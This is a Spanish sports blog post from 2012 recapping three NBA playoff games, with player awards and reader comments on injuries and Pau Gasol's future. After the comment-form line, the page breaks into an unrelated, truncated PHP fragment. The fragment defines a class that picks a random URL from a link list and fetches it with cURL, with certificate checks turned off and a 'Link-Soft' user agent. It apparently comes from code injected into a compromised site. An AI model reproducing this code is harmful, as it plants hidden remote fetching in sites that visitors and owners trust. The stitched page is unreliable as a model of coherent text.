La Crónica: Administrar las ausencias

02 de May de 2012 por TheDeerHunter

Todo parecía despejado para los Hawks con el 65 a 54 a favor a menos de tres minutos del final del tercer cuarto. En ausencia de Rondo y Allen, el ataque de los Celtics se había ido atascando y en ese momento parecían estar a punto de caramelo para cerrar el 2-0. Si algo nos enseñan los Playoffs es que no se puede dar nada por hecho y todo está por escribir hasta que queda escrito.

Así que, sin saber muy bien por qué, fueron los Hawks los que terminaron de apagón en esos últimos 3 minutos y se contrajo el marcador hasta el 66-61. Y cuando los Celtics huelen sangre… Atlanta no fue capaz de anotar durante los primeros 4 minutos del último periodo. Hasta el final, únicamente sumarían 4 canastas más y algún tiro libre. Por si fuera poco, Josh Smith salía lesionado justo cuando se estaba decidiendo todo. Pánico.

A los Celtics, sin embargo, no hay que explicarles cómo afrontar una situación así. Ante la duda, balones a Pierce, que se siente como pez en el agua. “The Truth” fue de menos a más y terminó superlativo, bien ayudado por Garnett y Bradley (87-80). La serie viaja al Garden empatada, pero los verdes recuperan efectivos mientras que los Hawks pueden añadir a Smith a la lista de lesionados, donde ya estaba Horford. ¿Sería definitivo? Pronto lo descubriremos.

Peor les sentó a los Bulls la baja de su líder. CJ Watson y John Lucas estuvieron correctos pero si hacía falta un paso adelante de todos para suplir a Derrick Rose, tanto Boozer como Deng lo dieron hacia atrás. Sólo Joakim Noah mejoró y los sistemas defensivos se desmoronaron. Doug Collins movió sus piezas recuperando a Hawes como titular. Fueron Jrue Holiday y Louis Williams quienes mejor aprovecharon la situación y Evan Turner completó uno de los mejores partidos de su carrera. Con más de 27 puntos anotados por cuarto, los Sixers simplemente tuvieron que esperar a que la victoria cayera por su propio peso. Hundimiento de los Bulls en el tercer cuarto y eliminatoria empatada (109-92).

Finalmente, los Lakers viajan a Denver con un 2-0 bastante controlado. Fieles a sí mismos, aún tuvieron tiempo de poner un poco de pimienta a la situación desperdiciando una ventaja de 19 puntos, aunque el resultado no llegó a peligrar realmente. La relajación surge a partir del dominio abrumador de Kobe y Bynum. Redención de Lawson tras su pésimo primer partido pero fue un querer y no poder para los Nuggets (100-104).

PREMIOS

MVP: Noche de pesos pesados. En Los Angeles el Big Three de los Lakers (especialmente Kobe Bryant y Andrew Bynum) hizo casi todo el trabajo al sumar 78 puntos, 23 rebotes y 9 asistencias, cada uno destacando en un aspecto. Paul Pierce cogió la riendas de los Celtics ante la ausencia de Rondo y acabó el partido con 36 puntos, 14 rebotes y 4 asistencias. Hoy le perdonamos las 8 pérdidas. Y a Jrue Holiday parece que se le abrió el cielo al ver en frente a CJ Watson en lugar de a Derrick Rose. Fue el mejor de los suyos con 26 puntos, 6 rebotes y una impresionante serie de 11 de 15 lanzamientos sin fallo en el triple.

Rookie: 14 puntos y 10 rebotes para Kenneth Faried en 26 minutos de juego. Tic-tac, tic-tac…

Sorpresa: Evan Turner tiene clase de sobra para hacer los 19 puntos, 7 rebotes y 6 asistencias que nos dejó anoche, pero no es que se lo veamos demasiado.

DecepciónCarlos Boozer y Luol Deng respondieron a la ausencia de Rose sumando entre ambos 17 puntos y un 7 de 22 en tiros. Así los Sixers tienen tantas posibilidades de pasar ronda como los propios Bulls.

Esfuerzo en vano: En cambio, Joakim Noah sí respondió muy bien con 21 puntos, 8 rebotes, 5 asistencias y 10 de 11 en tiros. Gran segunda mitad también de Ty Lawson, que debió de leer nuestras críticas del primer partido y ayer fue el mejor nugget con 25 puntos y 7 asistencias. La pareja Joe Johnson & Josh Smith sumó 38 puntos, 16 rebotes y 10 asistencias para los Hawks.

TOP-10


Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. nba dice:
    #1

    Respecto a la posibilidad de que Pau siga el año que viene en Lakers, veo imposible que siga , a no ser que se proclame el MVP de las finales, y tenga que seguir por aclamacion popular, el nº de tiros por partido que dispone incrementa la sensacion .
    Creo que tanto Bulls-Rockets-Indiana-Atlanta serán los candidatos a entrar en el trade de Gasol , la proxima temporada , ya que con lo que tienen no le da para mas, sobre todo ya se ha visto en Bulls-Indiana.

      Citar

  2. MagicJohnson32 dice:
    #2

    Los Lakers han vuelto a dominar claramente el partido, salvo por un tramo en la segunda parte. Los Nuggets son un equipo peligroso si no mantienes la tensión defensiva porque convierten cada pérdida, mal tiro, cada mala transición en puntos fáciles. Los Lakers estuvieron impecables durante todo el primer partido y durante casi toda la primera mitad del de anoche, y se despistaron en algunos tramos de la segunda parte, lo que le sirvió a Denver para ajustar el marcador. Ganar en Denver siempre es difícil pero la clave volverá a ser el ritmo del juego. Si LAL domina el rebote y se juega en estático, los Nuggets no tienen posibilidades.

      Citar

  3. rumbero dice:
    #3

    Espíritu verde al rescate. Sin Rondo, sin Allen, palmando de 10…hasta que aparece la defensa y (como casi siempre que está calentito el partido) el señor Pierce. Los C’s que se vuelven para Boston con un 1-1, un cursillo acelerado de PO para Bradley y bastante cansancio para Garnett y Pierce. A ver como gestionan los dos siguientes.
    Habrá que estar atentos al tobillo de J.Smith. Y ¿alguien sabe si Allen estará ya listo? Yo tenía entendido que ya estaba para jugar…

    PD: Sin ver haber visto nada, si a los Bulls les meten 109 puntos mal asunto. A ver si les ha afectado más de la cuenta la baja de Rose… Y Boozer por lo visto sigue en su modo jugón de PO

      Citar

  4. Viva_Dirk dice:
    #4

    nba:
    Respecto a la posibilidad de que Pau siga el año que viene en Lakers, veo imposible que siga , a no ser que se proclame el MVP de las finales, y tenga que seguir por aclamacion popular, el nº de tiros por partido quedispone incrementa la sensacion .
    Creo que tanto Bulls-Rockets-Indiana-Atlantaserán los candidatos a entrar en el trade de Gasol , la proxima temporada , ya que con lo que tienen no le da para mas, sobre todo ya se ha visto en Bulls-Indiana.

    No creo que el nº de tiros de Pau sea indicativo, de hecho a mi me parece que salvo que lo haga realmente mal en alguna eliminatoria o alguien de algo realmente interesante se va a quedar, mas aun si llegan lejos en play-offs.

    De los equipos que dices los Pacers tienen hueco para hacerse con un fichaje estrella sin desprenderse de nada. Atlanta podria ofrecer a Josh Smith y por ahí si podria ser. Houston deberia dar 3 hombres por Pau, Scola ha perdido valor aunque me parecería una gran incorporación si le acompañasen dos jóvenes que le den nivel al banco, tipo Dragic+Patterson/Parsons. A los Bulls seguro que les encantaria, pero deberian desmontar bastante el grupo tan bueno que han juntado.

    Vamos que yo veo a los Lakers haciendo un papelón y a Kobe&Pau haciendo de veteranos estrella sirviendo a Bynum

      Citar

  5. MagicJohnson32 dice:
    #5

    rumbero: Y ¿alguien sabe si Allen estará ya listo? Yo tenía entendido que ya estaba para jugar…

    Oficialmente, day-to-day, pero la lesión es seria. Se ha comentado ya que Allen saldrá desde el banquillo cuando esté recuperado y se tendrá que operar cuando acaben los Playoffs.

      Citar

  6. Ru dice:
    #6

    Vaya mierda de lesiones que no nos dejan ver a los equipos en su máximo esplendor,¡qué mala suerte!

      Citar

  7. Lucho dice:
    #7

    Kenneth Faried “arranco tarde”, pero ya le da para el quinteto de rookies? Que opinan? Para mi si, ya es merecido

      Citar

  8. Txusma dice:
    #8

    Lucho:
    Kenneth Faried “arranco tarde”, pero ya le da para el quinteto de rookies? Que opinan? Para mi si, ya es merecido

    Totalmente. Lo que me pregunto es si se acordarán de Ricky.

      Citar

  9. Esteban dice:
    #9

    PAU pertenece al selecto grupo de ala pivots, con cuerpo de pivot, club que integran garnett, duncan, y el propio pau, demasiado rapidos y con gran tiro exterior para ser marcados por pivots de mas de 2,10mts, y demasiado altos y con enorme envergadura para ser defendido por ala pivot de tamañan normal o mas rapidos

    esto los hace de los mejores 4 de la historia, en mi opnion ducan es el mejor, y garnett el segundo junto con malone y y pau los uno mejores extranjeros de la hisotoria de la nba

    pero al dia de hoy, el desgaste de piernas y agilidad pasa factura, duncan ya lleva años jugando de pivot, y garnett ya hizo el cambio esta temporada, cosa de la que no creo que vuelva

    pau debe hacer ese cambio, ya no es tan agil como antes, y al estilo duncan puede lastimar a pivots tirando de 5 metros,

    los lakers con bynum no es elk mejor lugar para que haga esa trasformacion, sin dudas seria mas util en otros equipos que en los propios lakers

      Citar

  10. Lucho dice:
    #10

    Txusma: Totalmente. Lo que me pregunto es si se acordarán de Ricky.

    Espero que si, aunque viniendo de los yankies no me extrañaria que elijan a Thomas. Para mi Ricky claramente debe estar.
    Walker y Knight quedaron bastante lejos

    (espero haber citado bien jeje)

      Citar

  11. GreenPride dice:
    #11

    Escribo bajando abajo sin saber aún el resultado de los Lakers para comentar el partido de los Celtics. Gran estocada la que han dado a la eliminatoria de la mano de unos imponentes Pierce y Garnett. Pierce ejerció todo el partido de Point-Forward siendo el que ha llevado el ataque. En defensa Garnett ha sido un muro y ha cogido un rato la responsabilidad ofensiva en el inicio del último cuarto para dar un respiro a The Truth.
    Si en el primer partido hicieron un trabajo horroroso ambos y a pesar del pésimo partido (se salvó solo Rondo) estuvieron a punto de llevárselo, en este segundo hemos visto algo que ya advertimos en la previa. Los Hawks son un buen equipo pero en el clutch son un equipo sin mucho rumbo y en esta eliminatoria contra los experimentadísimos Celtics les va a pasar factura, más aún si Josh Smith se ha lesionado de cierta gravedad, parece que se perderá el tercer partido pero volverá para el cuarto pero veremos en qué estado. En el primero dominaron 3 cuartos y pico y en el último no les llegó el agua al cuello con el último arreón de los de Boston. Esta vez la ventaja era menor llegados al último cuarto y la reacción de los de Boston les quitó la ventaja de campo. Han perdido una ocasión única para acabar con unos Celtics sin Rondo ni Ray Allen que yo creo que les va a pasar factura. De vuelta a Boston y con Rondo y Ray de vuelta al equipo veo la eliminatoria como en la previa, para Boston en 6. Creo que la eliminatoria sería diferente con Al Horford, pero tal y como está creo que caerá del lado verde

      Citar

  12. GreenPride dice:
    #12

    Ya terminé de ver los partidos de este día. Mis pronósticos en el Lakers-Nuggets se van cumpliendo. Los Nuggets simplemente no tienen juego interior con el que parar a los Lakers que les dominan a placer y sólo cuando se relajan les dejan entrar en el partido. Los de Denver son un equipo atlético y de baloncesto muy bonito de ver con muchas transiciones y juego rápido pero eso en PO no basta y me sorprendería si consiguieran alargar la serie al 6º partido, como mucho creo que rascarán un partido en Denver. Por los Lakers fenomenales Kobe&Bynum y si todo sigue así les espera una eliminatoria apasionante contra los Thunder.
    Por otra parte, los Bulls parece que todavía andan depresivos por la lesión de Rose. Si Deng y Boozer no tiran del carro pueden pasarlo mal incluso para pasar esta eliminatoria pues no son un equipo sobrado de talento en ataque pero si les meten 109 puntos entonces ya si apaga y vamonos. Deben recuperar su defensa, para desde ella afianzarse en ataque. Creo que siguen siendo favoritos para esta eliminatoria, ya veremos si también para la siguiente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>